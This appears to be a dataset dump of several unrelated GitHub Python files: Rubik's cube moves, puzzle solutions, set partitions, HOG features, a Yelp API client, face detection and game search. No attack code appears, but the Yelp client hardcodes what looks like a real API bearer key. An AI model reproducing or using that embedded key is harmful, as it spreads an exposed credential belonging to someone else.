coins_trois_quatre_sept_huit[2] = coins_trois_quatre_sept_huit[2], coins_trois_quatre_sept_huit[1], coins_trois_quatre_sept_huit[0]\r\n coins[i] = coins_trois_quatre_sept_huit\r\n coins[2], coins[3], coins[6], coins[7] = coins[6], coins[2], coins[7], coins[3]\r\n for j in liste_arretes:\r\n arrete_trois_quatre_onze_douze = arretes[j]\r\n arrete_trois_quatre_onze_douze[0], arrete_trois_quatre_onze_douze[1] = arrete_trois_quatre_onze_douze[1], arrete_trois_quatre_onze_douze[0]\r\n arretes[j] = arrete_trois_quatre_onze_douze\r\n arretes[1], arretes[5], arretes[10], arretes[11] = arretes[10], arretes[11], arretes[5], arretes[1]\r\n return (arretes,coins)\r\n\r\n\r\ndef down_prime(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = down(arretes, coins)\r\n return arretes, coins\r\n\r\n\r\ndef front_prime(arretes,coins):\r\n liste_coins=[0,2,4,6]\r\n for i in liste_coins:\r\n coins_1_3_5_7 = coins[i]\r\n coins_1_3_5_7[0], coins_1_3_5_7[1], coins_1_3_5_7[2] = coins_1_3_5_7[1], coins_1_3_5_7[0], coins_1_3_5_7[2]\r\n coins[i] = coins_1_3_5_7\r\n coins[0], coins[2], coins[4], coins[6] = coins[2], coins[6], coins[0], coins[4]\r\n arretes[2], arretes[6], arretes[8], arretes[10] 
= arretes[10], arretes[8], arretes[2], arretes[6]\r\n return (arretes,coins)\r\n\r\n\r\ndef front(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = front_prime(arretes, coins)\r\n return arretes, coins\r\n\r\n\r\ndef back_prime(arretes,coins):\r\n liste_coins = [1,3,5,7]\r\n liste_arretes = [3,7,9,11]\r\n for i in liste_coins:\r\n coins_2_4_6_8 = coins[i]\r\n coins_2_4_6_8[0], coins_2_4_6_8[1], coins_2_4_6_8[2] = coins_2_4_6_8[1], coins_2_4_6_8[0], coins_2_4_6_8[2]\r\n coins[i] = coins_2_4_6_8\r\n coins[1], coins[3], coins[5], coins[7] = coins[5], coins[1], coins[7], coins[3]\r\n arretes[3], arretes[7], arretes[9], arretes[11] = arretes[9], arretes[11], arretes[7], arretes[3]\r\n return (arretes,coins)\r\n\r\n\r\ndef back(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = back_prime(arretes, coins)\r\n return arretes, coins\r\n\r\n\r\ndef middle(arretes,centres):\r\n liste_centres = [2,3,4,5]\r\n liste_arretes = [8,9,10,11]\r\n centres[2], centres[3], centres[4], centres[5] = centres[5], centres[4], centres[2], centres[3]\r\n for i in liste_arretes:\r\n arretes9_10_11_12 = arretes[i]\r\n arretes9_10_11_12[0] , arretes9_10_11_12[1] = arretes9_10_11_12[1], arretes9_10_11_12[0]\r\n arretes[i] = arretes9_10_11_12\r\n arretes[8] , arretes[9] , arretes[10] , arretes[11] = arretes[9] , arretes[11] , arretes[8] , arretes[10]\r\n return(arretes,centres)\r\n\r\n\r\ndef middle_prime(arretes,centres):\r\n for i in range(0,3):\r\n arretes,centres = middle(arretes,centres)\r\n return arretes, centres\r\n\r\n\r\ndef equator(arretes,centres):\r\n liste_arretes = [2,3,6,7]\r\n centres[0], centres[1], centres[4], centres[5] = centres[4], centres[5], centres[1], centres[0]\r\n for i in liste_arretes:\r\n arrete3_4_7_8 = arretes[i]\r\n arrete3_4_7_8[0], arrete3_4_7_8[1] = arrete3_4_7_8[1], arrete3_4_7_8[0]\r\n arretes[i] = arrete3_4_7_8\r\n arretes[2], arretes[3], arretes[6], arretes[7] = arretes[6], arretes[2], arretes[7], arretes[3]\r\n return(arretes, centres )\r\n\r\n\r\ndef equator_prime(arretes , centres):\r\n for i in range(0,3):\r\n arretes,centres = equator(arretes,centres)\r\n return arretes, centres\r\n\r\nJ_sym = [\"'R\",\"U\",\"'L\",\"2U\",\"R\",\"'U\",\"'R\",\"2U\",\"R\",\"L\",\"'U\"]\r\nJ_sym_mod = ['R','U',\"'L\",\"2U\",\"R\",\"'U\",\"'R\",\"2U\",\"L\",\"R\",\"'U\",\"2R\"]\r\nPLL_J = [\"R\",\"U\", \"'R\",\"'F\", \"R\", \"U\", \"'R\", \"'U\", \"'R\", \"F\", \"2R\", \"'U\", \"'R\", \"'U\"]\r\nPLL_Y = ['F', 'R',\"'U\",\"'R\",\"'U\",'R','U',\"'R\",\"'F\",'R','U',\"'R\",\"'U\",\"'R\",'F','R',\"'F\"]\r\nPLL_T = ['R', 'U', \"'R\", \"'U\", \"'R\", \"F\", \"2R\", \"'U\", \"'R\", \"'U\", \"R\", \"U\", \"'R\", \"'F\"]","repo_name":"MaelSa/RubiksSolver","sub_path":"fonctions_deplacement.py","file_name":"fonctions_deplacement.py","file_ext":"py","file_size_in_byte":6648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13190775765","text":"def solution(line):\n point_x = []\n point_y = []\n n = len(line)\n\n for i in range(n - 1):\n A = line[i][0]\n B = line[i][1]\n E = line[i][2]\n\n for j in range(i + 1, n):\n C = line[j][0]\n D = line[j][1]\n F = line[j][2]\n\n if ((A * D) - (B * C)) == 0:\n continue\n\n x = ((B * F) - (E * D)) / ((A * D) - (B * C))\n y = ((E * C) - (A * F)) / ((A * D) - (B * C))\n\n if x > int(x) or y > int(y) or x < int(x) or y < int(y):\n continue\n\n point_x.append(int(x))\n point_y.append(int(y))\n\n max_x = max(point_x)\n min_x = min(point_x)\n max_y = max(point_y)\n min_y = min(point_y)\n\n 
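# note (added comment): the shift applied below assumes min_x <= 0 <= max_y, which holds for the sample input; each shifted point then indexes star[row][col] directly\n 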
width = abs(max_x - min_x)\n height = abs(max_y - min_y)\n\n star = [\".\" * (width + 1) for _ in range(height + 1)]\n\n for i in range(len(point_x)):\n point_x[i] += abs(min_x)\n point_y[i] -= abs(max_y)\n\n s = star[abs(point_y[i])]\n star[abs(point_y[i])] = s[:point_x[i]] + \"*\" + s[point_x[i] + 1:]\n\n return star\n\n\nsolution([[2, -1, 4], [-2, -1, 4], [0, -1, 1], [5, -8, -12], [5, 8, 12]])","repo_name":"Eui9179/algorithm-study","sub_path":"programmers/python/book/array/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73574061813","text":"# From codereview.stackexchange.com\n#[1, 2, 3, 4]\n# [{}, {}] [a, b\n\n# [1,2,3] [[1]] [[1] [2]] [[1, 2]]\n#[[2, 3]] [[3], [2]]\n\n\ndef partition(collection):\n if len(collection) == 1:\n yield [collection]\n return\n\n first = collection[0]\n for smaller in partition(collection[1:]):\n # insert `first` in each of the subpartition's subsets\n for n, subset in enumerate(smaller):\n yield smaller[:n] + [[first] + subset] + smaller[n + 1:]\n # put `first` in its own subset\n yield [[first]] + smaller\n\n\ndef partitions(set_):\n if not set_:\n yield []\n return\n for i in range(2**len(set_) // 2):\n parts = [set(), set()]\n for item in set_:\n parts[i & 1].add(item)\n i >>= 1\n for b in partitions(parts[1]):\n yield [parts[0]] + b\n\n\n# This is a helper function that will fetch all of the available\n# partitions for you to use for your brute force algorithm.\ndef get_partitions(set_):\n for partition in partitions(set_):\n yield [list(elt) for elt in partition]\n\n# Uncomment the following code and run this file\n# to see what get_partitions does if you want to visualize it:\n\n\n# for item in (get_partitions(['a', 'b', 'c', 'd'])):\n# print(item, len(item))\n\n# for i in partition(['a', 'b', 'c', 'd']):\n# print(i, len(i))\n","repo_name":"Axolot1/Introduction-to-Computational-Thinking-and-Data-Science","sub_path":"Unit1_Greedy_DP_Graph/pset1/ps1_partition.py","file_name":"ps1_partition.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27320904612","text":"import hydra\nfrom omegaconf import DictConfig\n\nfrom src.preprocessing.preencode_libri import LibriPreprocessor\nfrom src import utils\n\nlog = utils.get_logger(__name__)\n\n\ndef preprocess(config: DictConfig) -> None:\n \n # 0. instantiate preprocessor\n log.info(f\"Instantiating preprocessor <{config.preprocessing._target_}>\")\n preprocessor: LibriPreprocessor = hydra.utils.instantiate(config.preprocessing)\n\n # 1. Load data\n log.info(f\"Loading dataset <{config.preprocessing.dataset_name}/{config.dataset_split}>\")\n preprocessor.load_dataset(config.dataset_split)\n \n # 2. Speech file to array\n log.info(\"Copying speech array and sampling rate.\")\n preprocessor.speech_file_to_array()\n \n # 3. Filter audio samples longer than max_audio_length\n log.info(f\"Filtering audio samples longer than {config.max_audio_length} seconds.\")\n preprocessor.filter_long_audio(config.max_audio_length)\n \n # 4. extract features from audio\n log.info(f\"Extracting features from audio and tokenizing text.\")\n preprocessor.extract_features_and_tokenize()\n \n # 5. encode text\n log.info(f\"Encoding text with BERT: <{config.preprocessing.text_model_name}>.\")\n preprocessor.encode_text()\n \n # 6. 
save data\n save_loc_dict = {\n 'workdir': config.path_local,\n 'HD': config.path_hd,\n 'drive': config.path_colab,\n }\n log.info(f\"Saving data to <{save_loc_dict[config.save_in]}{config.save_path}>.\")\n preprocessor.save_dataset(save_loc_dict[config.save_in], config.save_path)\n \n ","repo_name":"marcomoldovan/cross-modal-speech-segment-retrieval","sub_path":"src/preprocessing_pipeline.py","file_name":"preprocessing_pipeline.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3123523573","text":"import numpy as np\nfrom scipy import sqrt, pi, arctan2, cos, sin\nfrom scipy.ndimage import uniform_filter\n\n\ndef hog(image, orientations=9, pixels_per_cell=(8, 8),\n cells_per_block=(3, 3), visualise=False, normalize=False):\n \"\"\"Extract Histogram of Oriented Gradients (HOG) for a given image.\n\n Compute a Histogram of Oriented Gradients (HOG) by\n\n 1. (optional) global image normalization\n 2. computing the gradient image in x and y\n 3. computing gradient histograms\n 4. normalizing across blocks\n 5. flattening into a feature vector\n\n Parameters\n ----------\n image : (M, N) ndarray\n Input image (greyscale).\n orientations : int\n Number of orientation bins.\n pixels_per_cell : 2 tuple (int, int)\n Size (in pixels) of a cell.\n cells_per_block : 2 tuple (int,int)\n Number of cells in each block.\n visualise : bool, optional\n Also return an image of the HOG.\n normalize : bool, optional\n Apply power law compression to normalize the image before\n processing.\n\n Returns\n -------\n newarr : ndarray\n HOG for the image as a 1D (flattened) array.\n hog_image : ndarray (if visualise=True)\n A visualisation of the HOG image.\n\n References\n ----------\n * http://en.wikipedia.org/wiki/Histogram_of_oriented_gradients\n\n * Dalal, N and Triggs, B, Histograms of Oriented Gradients for\n Human Detection, IEEE Computer Society Conference on Computer\n Vision and Pattern Recognition 2005 San Diego, CA, USA\n\n \"\"\"\n image = np.atleast_2d(image)\n\n \"\"\"\n The first stage applies an optional global image normalization\n equalization that is designed to reduce the influence of illumination\n effects. In practice we use gamma (power law) compression, either\n computing the square root or the log of each color channel.\n Image texture strength is typically proportional to the local surface\n illumination so this compression helps to reduce the effects of local\n shadowing and illumination variations.\n \"\"\"\n\n if image.ndim > 3:\n raise ValueError(\"Currently only supports grey-level images\")\n\n if normalize:\n image = sqrt(image)\n\n \"\"\"\n The second stage computes first order image gradients. These capture\n contour, silhouette and some texture information, while providing\n further resistance to illumination variations. The locally dominant\n color channel is used, which provides color invariance to a large\n extent. Variant methods may also include second order image derivatives,\n which act as primitive bar detectors - a useful feature for capturing,\n e.g. bar like structures in bicycles and limbs in humans.\n \"\"\"\n\n gx = np.zeros(image.shape)\n gy = np.zeros(image.shape)\n gx[:, :-1] = np.diff(image, n=1, axis=1)\n gy[:-1, :] = np.diff(image, n=1, axis=0)\n\n \"\"\"\n The third stage aims to produce an encoding that is sensitive to\n local image content while remaining resistant to small changes in\n pose or appearance. 
The adopted method pools gradient orientation\n information locally in the same way as the SIFT [Lowe 2004]\n feature. The image window is divided into small spatial regions,\n called \"cells\". For each cell we accumulate a local 1-D histogram\n of gradient or edge orientations over all the pixels in the\n cell. This combined cell-level 1-D histogram forms the basic\n \"orientation histogram\" representation. Each orientation histogram\n divides the gradient angle range into a fixed number of\n predetermined bins. The gradient magnitudes of the pixels in the\n cell are used to vote into the orientation histogram.\n \"\"\"\n\n magnitude = sqrt(gx ** 2 + gy ** 2)\n orientation = arctan2(gy, (gx + 1e-15)) * (180 / pi) + 90\n\n sy, sx = image.shape\n cx, cy = pixels_per_cell\n bx, by = cells_per_block\n\n n_cellsx = int(np.floor(sx // cx)) # number of cells in x\n n_cellsy = int(np.floor(sy // cy)) # number of cells in y\n\n # compute orientations integral images\n orientation_histogram = np.zeros((n_cellsy, n_cellsx, orientations))\n for i in range(orientations):\n # create new integral image for this orientation\n # isolate orientations in this range\n\n temp_ori = np.where(orientation < 180 / orientations * (i + 1),\n orientation, 0)\n temp_ori = np.where(orientation >= 180 / orientations * i,\n temp_ori, 0)\n # select magnitudes for those orientations\n cond2 = temp_ori > 0\n temp_mag = np.where(cond2, magnitude, 0)\n\n # integer division (//) keeps the slice start an int on Python 3\n orientation_histogram[:, :, i] = \\\n uniform_filter(temp_mag, size=(cy, cx))[cy // 2::cy, cx // 2::cx]\n\n # now for each cell, compute the histogram\n # orientation_histogram = np.zeros((n_cellsx, n_cellsy, orientations))\n\n radius = min(cx, cy) // 2 - 1\n hog_image = None\n if visualise:\n hog_image = np.zeros((sy, sx), dtype=float)\n\n if visualise:\n from skimage import draw\n\n for x in range(n_cellsx):\n for y in range(n_cellsy):\n for o in range(orientations):\n centre = tuple([y * cy + cy // 2, x * cx + cx // 2])\n dx = radius * cos(float(o) / orientations * np.pi)\n dy = radius * sin(float(o) / orientations * np.pi)\n # draw.line replaces draw.bresenham, which newer\n # scikit-image releases removed; endpoints must be ints\n rr, cc = draw.line(int(centre[0] - dx), int(centre[1] - dy),\n int(centre[0] + dx), int(centre[1] + dy))\n hog_image[rr, cc] += orientation_histogram[y, x, o]\n\n \"\"\"\n The fourth stage computes normalization, which takes local groups of\n cells and contrast normalizes their overall responses before passing\n to the next stage. Normalization introduces better invariance to illumination,\n shadowing, and edge contrast. It is performed by accumulating a measure\n of local histogram \"energy\" over local groups of cells that we call\n \"blocks\". The result is used to normalize each cell in the block.\n Typically each individual cell is shared between several blocks, but\n its normalizations are block dependent and thus different. The cell\n thus appears several times in the final output vector with different\n normalizations. 
This may seem redundant but it improves the performance.\n We refer to the normalized block descriptors as Histogram of Oriented\n Gradient (HOG) descriptors.\n \"\"\"\n\n n_blocksx = (n_cellsx - bx) + 1\n n_blocksy = (n_cellsy - by) + 1\n normalized_blocks = np.zeros((n_blocksy, n_blocksx,\n by, bx, orientations))\n\n for x in range(n_blocksx):\n for y in range(n_blocksy):\n block = orientation_histogram[y:y + by, x:x + bx, :]\n eps = 1e-5\n normalized_blocks[y, x, :] = block / sqrt(block.sum() ** 2 + eps)\n\n \"\"\"\n The final step collects the HOG descriptors from all blocks of a dense\n overlapping grid of blocks covering the detection window into a combined\n feature vector for use in the window classifier.\n \"\"\"\n\n if visualise:\n return normalized_blocks.ravel(), hog_image\n else:\n return normalized_blocks.ravel()\n","repo_name":"Samsung/veles","sub_path":"veles/external/hog.py","file_name":"hog.py","file_ext":"py","file_size_in_byte":7228,"program_lang":"python","lang":"en","doc_type":"code","stars":903,"dataset":"github-code","pt":"21"} +{"seq_id":"23667260700","text":"import os\nimport mesa\n\nfrom ..model import RoomModel\nfrom ..file_loader import FileLoader\n\n\nfilename = \"./maps/topology/10V.txt\"\nfilename = os.path.abspath(filename)\nfl = FileLoader(filename)\ncanvas = fl.get_canvas(1080)\n\nmodel_params = {\n \"ks\": mesa.visualization.Slider(\"Sensitivity to static potential kS\", 3, 1.0, 10.0, 0.5),\n \"ko\": mesa.visualization.Slider(\"Sensitivity to occupied cell kO\", 0.0, 0.0, 1.0, 0.1),\n \"kd\": mesa.visualization.Slider(\"Sensitivity to diagonal movement kD\", 0.5, 0.0, 1.0, 0.1),\n \"leader_movement_duration\": mesa.visualization.Slider(\"Movement duration for leader\", 2, 2, 6, 1),\n \"agent_movement_duration\": mesa.visualization.Slider(\"Movement duration for followers\", 3, 2, 6, 1),\n \"penalization_orientation\": mesa.visualization.Slider(\"Penalization for incorrect orientation\", 1.0, 0.0, 1.0, 0.1),\n \"leader_front_location_switch\": mesa.visualization.Checkbox(\"Switch for leader location at the front\", False),\n \"fileloader\": fl\n}\n\nserver = mesa.visualization.ModularServer(\n RoomModel,\n [canvas],\n \"Room Model\",\n model_params,\n)\nserver.port = 8521 # The default","repo_name":"bumbac/MT","sub_path":"src/roommodel/visualization/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33182726735","text":"import sys\nimport io\n\n#Problem 4\n# Solution heavily inspired by: https://github.com/Diusrex/UVA-Solutions/blob/master/10687%20Monitoring%20the%20Amazon.cpp\ntxt = \"\"\"4 \n1 0 0 1 -1 0 0 -1\n8 \n1 0 1 1 0 1 -1 1 -1 0 -1 -1 0 -1 1 -1\n6 \n0 3 0 4 1 3 -1 3 -1 -4 -2 -5\n0\"\"\"\n\nstdin = io.StringIO(txt)\n#Actual use (Comment the below line for testing)\nstdin = sys.stdin\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n \n def __lt__(self, other):\n if self.x != other.x:\n return self.x < other.x\n return self.y < other.y\n\ndef square(num):\n return num * num\n\ndef find_closest_for_all(points, n, two_neighbors):\n n = len(points)\n for i in range(n):\n two_neighbors[i][0], two_neighbors[i][1] = -1, -1\n first_distance, second_distance = 1000000000000, 1000000000000\n \n for j in range(n):\n if i != j:\n sq_distance = (points[i].x - points[j].x)**2 +(points[i].y - points[j].y)**2\n if two_neighbors[i][0] == -1 or first_distance > sq_distance:\n two_neighbors[i][1] = 
two_neighbors[i][0]\n second_distance = first_distance\n \n two_neighbors[i][0] = j\n first_distance = sq_distance\n elif two_neighbors[i][1] == -1 or second_distance > sq_distance:\n two_neighbors[i][1] = j\n second_distance = sq_distance\n\ndef dfs(node, two_neighbors, reached):\n if node == -1 or reached[node]:\n return 0\n reached[node] = True\n return 1 + dfs(two_neighbors[node][0], two_neighbors, reached) + dfs(two_neighbors[node][1], two_neighbors, reached)\n\n\nwhile True:\n n = int(stdin.readline().strip())\n if n == 0:\n break\n data = list(map(int, stdin.readline().split()))\n\n points= []\n for i in range(0, len(data), 2):\n points.append(Point(data[i], data[i+1]))\n\n station = points[0]\n points.sort(key=lambda p: (p.x, p.y))\n two_neighbors = [[-1, -1] for _ in range(n)]\n find_closest_for_all(points, n, two_neighbors)\n\n reached = [False] * n\n valid = False\n for i in range(n):\n if station.x == points[i].x and station.y == points[i].y:\n valid = (dfs(i, two_neighbors, reached) == n)\n\n if valid:\n print(\"All stations are reachable.\")\n else:\n print(\"There are stations that are unreachable.\")\n","repo_name":"William-CarterG/Algorithms-Competitive-Programming-Solutions","sub_path":"Lecture 06/10687 - Monitoring the Amazon.py","file_name":"10687 - Monitoring the Amazon.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12479881401","text":"import requests\nimport urllib\nfrom urllib.error import HTTPError\nfrom urllib.parse import quote\n\n''' Cette classe va être celle qui va nous permettre de nous connecter à l'API de Yelp et de récupérer ensuite ses données\nNous effectuons seulement la requête sans mettre en compte de paramètres, l'objectif de cette classe étant uniquement la connection'''\n\nclass API:\n ''' La classe API possède seulement un attribut statut qui sera déterminé lors de la connection\n Nous aurions pu utiliser des attributs host ou path si nous aurions voulu réutiliser ce code pour d'autres Webservices mais nous l'utiliserons en pratique\n juste pour Yelp API.\n Elle possède deux méthodes correspondants aux endpoints que nous utiliserons dans le projet, et une méthode permettant de comprendre le statut du code\n '''\n def __init__(self,statut : str = None):\n self.statut = statut\n\n\n def connect_search(self,parameters = None):\n\n ''' Cette première méthode permet à partir de paramètres de rechercher un restaurant sur la base de données de Yelp\n Les paramètres et les fonctions dessus seront implémentées dans services\n Cette fonction permet alors de se connecter à l'endpoint https://api.yelp.com/v3/businesses/search\n '''\n parameters = parameters or {}\n key = \"jTKT7VXQpA2_ovJ98xuWrUvbGrrf2CnKqQUpjHeYZ-N93IsP-HcvvHCctE41ngSp6Ox4xtrOquyVe2xSBiEM7XZYJdrYP834Q_Dm5E-X8j3AlyeR4V1WMeggytlvYXYx \"\n url = '{0}{1}'.format('https://api.yelp.com/v3', quote('/businesses/search'.encode('utf8')))\n headers = {\n 'Authorization': 'Bearer %s' % key,\n }\n print(u'Se connecte à {0} ...'.format(url))\n res = requests.request('GET', url, headers=headers, params = parameters)\n self.statut = res.status_code\n return (res.json())\n\n\n def connect_id(self, id : str = None):\n\n ''' Cette seconde méthode permet de rechercher un restaurant sur la base de données de Yelp à partir de son identifiant\n Les fonctions dessus seront implémentées dans services\n Cette fonction permet alors de se connecter à l'endpoint https://api.yelp.com/v3/businesses/{id}\n '''\n id 
= id or ''\n endpoint = '/businesses/' + id\n key = \"jTKT7VXQpA2_ovJ98xuWrUvbGrrf2CnKqQUpjHeYZ-N93IsP-HcvvHCctE41ngSp6Ox4xtrOquyVe2xSBiEM7XZYJdrYP834Q_Dm5E-X8j3AlyeR4V1WMeggytlvYXYx \"\n url = '{0}{1}'.format('https://api.yelp.com/v3', quote(endpoint.encode('utf8')))\n headers = {\n 'Authorization': 'Bearer %s' % key,\n }\n print(u'Se connecte à {0} ...'.format(url))\n res = requests.request('GET', url, headers=headers, params = None)\n self.statut = res.status_code\n return (res.json())\n\n\n def statutconnection(self):\n\n '''Cette méthode permet de savoir si la connexion a réussi/échoué et quel est le message d'erreur associé\n Le code de statut renvoyé par le module requests n'étant qu'un nombre, ceci peut être utile pour comprendre plus rapidement des erreurs\n '''\n a = self.statut\n if a == 200:\n return(\"tout s'est bien passé\")\n if a == 201:\n return(\"ressource créée avec succès\")\n if a == 202:\n return(\"requête acceptée, sans garantie du résultat\")\n if a == 400:\n return(\"erreur de syntaxe dans la requête\")\n if a == 403:\n return(\"ressource interdite (droits)\")\n if a == 401:\n return(\"erreur, authentification nécessaire\")\n if a == 404:\n return(\"ressource non trouvée\")\n if a == 405:\n return(\"une mauvaise méthode http a été utilisée\")\n if a == 500:\n return(\"erreur côté serveur\")\n if a == 503:\n return(\"service temporairement indisponible\")\n if a is None:\n return(\"Connectez vous d'abord à l'API avant de demander le statut\")\n else:\n # str(a) évite un TypeError (int + str)\n return(str(a) + \" : un résultat 2XX indique un succès, un résultat 4XX ou 5XX une erreur\")\n \n\n ","repo_name":"lk34000/EnsaEats","sub_path":"api/API/Connect_API.py","file_name":"Connect_API.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"36994881845","text":"import numpy as np\nfrom air_calculations import calculate_air_properities\n\n\ndef calculateChanges(mission_data, include_apu_flow = False, dt = 10):\n # per-step mission increments: [time, height (via rate of climb), engine fuel, APU fuel]\n mission_properties = np.array([0, 0, 0, 0])\n for phase in mission_data:\n time = phase[-1]\n rate_of_climb = 1 / time * (phase[1] - phase[0])\n engine_fuel_flow = phase[2] / time\n apu_fuel_flow = phase[3]\n increment = np.array([1, rate_of_climb, engine_fuel_flow, apu_fuel_flow])\n steps = np.zeros((int(np.floor(time/dt)), increment.shape[0]))\n steps[:, :] = np.multiply(increment, dt)\n if time%dt>0:\n steps = np.vstack((steps, np.multiply(increment, time%dt)))\n mission_properties = np.vstack((mission_properties, steps))\n if not include_apu_flow:\n mission_properties = np.delete(mission_properties, -1, 1)\n return np.multiply(mission_properties, np.array([1, 1, -1]))\n\n\ndef defineProfile(changes, deviation_reserves, rate_reserve, evaporation):\n total_fuel = np.sum(changes[:, 2])\n if changes.shape[1] > 3:\n total_fuel += np.sum(changes[:, 3])\n starting_fuel = total_fuel*(1+rate_reserve/(1-rate_reserve)) + deviation_reserves + evaporation\n profile = np.empty_like(changes)\n profile[0, 2] = starting_fuel\n changes[:, 2] = np.multiply(changes[:, 2], -1)\n for row in range(changes.shape[0]):\n if row == 0:\n profile[row, :1] = changes[row, :1]\n else:\n profile[row, :] = profile[row - 1, :] + changes[row, :]\n return np.multiply(profile, np.array([1, 1, -1]))\n\n\ndef defineAirProfile(profile):\n air_profile = np.empty_like(profile)\n for row in range(profile.shape[0]):\n air_profile[row, :] = 
calculate_air_properities(profile[row, 1])\n return air_profile","repo_name":"0110lekniw/LH2-tanks-simulation","sub_path":"define_mission.py","file_name":"define_mission.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"30589209057","text":"#Import the libraries\nimport cv2\n\nvideo=True #if true start the video\n\n#Function to detect the object\ndef detect(path):\n\n #Classifier\n face_cascade = cv2.CascadeClassifier(\n filename=f\"{cv2.data.haarcascades}/haarcascade_frontalface_default.xml\"\n )\n\n #Condition to start the function\n if video:\n video_cap = cv2.VideoCapture('arsene.mp4') \n else:\n print('No video')\n return\n\n while True:\n # Capture frame-by-frame\n ret, img = video_cap.read()\n\n #converting to gray image for faster video processing\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n #Parameters of CascadeClassifier\n faces = face_cascade.detectMultiScale(gray, \n scaleFactor=1.5, # scale change on each detection pass\n minNeighbors=5 # neighbors required before a detection is accepted \n )\n\n # if at least 1 face detected\n if len(faces) > 0:\n # Draw a rectangle around the faces\n for (x, y, w, h) in faces:\n cv2.rectangle(img, pt1= (x, y), pt2= (x + w, y + h), color=(0, 255, 0), thickness=2)\n \n # Display the resulting frame\n cv2.imshow('Face Detection on Video', img)\n\n #wait for 'c' to close the application\n if cv2.waitKey(1) & 0xFF == ord('c'):\n break\n #Defining size for the output video\n width = int(video_cap.get(cv2.CAP_PROP_FRAME_WIDTH)) # float `width`\n height = int(video_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n \n #Local and parameters for the output video\n output_video = cv2.VideoWriter( './saida/out.avi',cv2.VideoWriter_fourcc(*'DIVX'), 24, (width, height))\n output_video.release()\n video_cap.release()\n\n\n#Main Function to start the program\ndef main():\n cascadeFilePath=\"haarcascade_frontalface_alt.xml\"\n detect(cascadeFilePath)\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ipatriciahonorato/Modulo-6","sub_path":"Prova 2/Prova/exemplos/tentativa_final.py","file_name":"tentativa_final.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"1189370361","text":"from models.heuristica import decision\nfrom models.bfs import breadth_first_search\nfrom models.dfs import depthFirstSearch\nfrom models.ga import ga\nfrom utils.moves import flip\nfrom utils.colision import is_coliding\n\nfrom time import sleep\nfrom datetime import datetime\n\n\ndef get_action(state, model='heuristica'):\n if model == 'heuristica':\n action = decision(state)\n return action\n\n elif model == 'bfs':\n sleep(3)\n s = datetime.now()\n player = [state['player'], 0]\n paths = breadth_first_search(\n player, goal=-90*103, game_state=state['state']\n )\n score = final_score(paths)\n print(score)\n print(datetime.now() - s)\n return paths\n\n elif model == 'dfs':\n sleep(1)\n s = datetime.now()\n player = [state['player'], 0]\n paths = depthFirstSearch(\n player, goal=-90*33, game_state=state['state']\n )\n score = final_score(paths)\n print(datetime.now() - s)\n print(score)\n \n # sleep(1)\n return paths\n\n elif model == 'GA':\n sleep(1)\n s = datetime.now()\n paths = ga(state=state)\n paths = list(\n map(lambda action: 'FLIP' if action == 1 else 'STAY', paths))\n print(datetime.now() - s)\n\n return paths\n\n elif model == 'genetico_2':\n pass\n\n 
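# (added comment) unrecognized model names fall through to the default branch below\n 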
else:\n action = None\n return action\n\n\ndef evaluation(actions, state):\n player = state['player']\n state = state['state']\n\n score = 0\n steps = 1\n\n for action in actions:\n if action == 'FLIP':\n score -= 5\n player = flip[player]\n\n if is_coliding(player, state, steps=steps):\n return score - 200\n\n steps += 1\n\n return score\n\n\ndef final_score(actions):\n score = 0\n for action in actions:\n if action == 'FLIP':\n score -= 5\n score += 10\n return score\n\n\ndef best_fit(paths, state):\n return max(paths, key=lambda x: evaluation(x[1], state))\n","repo_name":"Cangerana/fulga_do_xadrez","sub_path":"models/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34651604014","text":"from PIL import Image\nimport os.path\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, Http404\n\nfrom .donate_o_meter import DonateOMeter\nfrom .models import DonateAim\n\n# Create your views here.\ndef meter16(request):\n dir_ = os.path.dirname(os.path.realpath(__file__))\n imgs = os.path.join(dir_, 'imgs')\n empty_path = os.path.join(imgs, 'sektglas.png')\n full_path = os.path.join(imgs, 'sektglas-voll.png')\n empty = Image.open(empty_path)\n full = Image.open(full_path)\n aim = None\n try:\n aim = DonateAim.objects.get(pk=2016)\n except DonateAim.DoesNotExist as e:\n raise Http404('No DonateAim for 2016')\n box = 24, 0, 176, 332\n meter = DonateOMeter(empty, full, aim.aim, box=box)\n img = meter.draw(aim.current)\n response = HttpResponse(content_type='image/png')\n img.save(response, 'PNG')\n return response\n","repo_name":"FabianWe/csd-freiburg-forms","sub_path":"csd_freiburg_forms/donate_o_meter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9735557020","text":"\"\"\"initial migration\n\nRevision ID: 114aee2ddff4\nRevises: None\nCreate Date: 2016-05-09 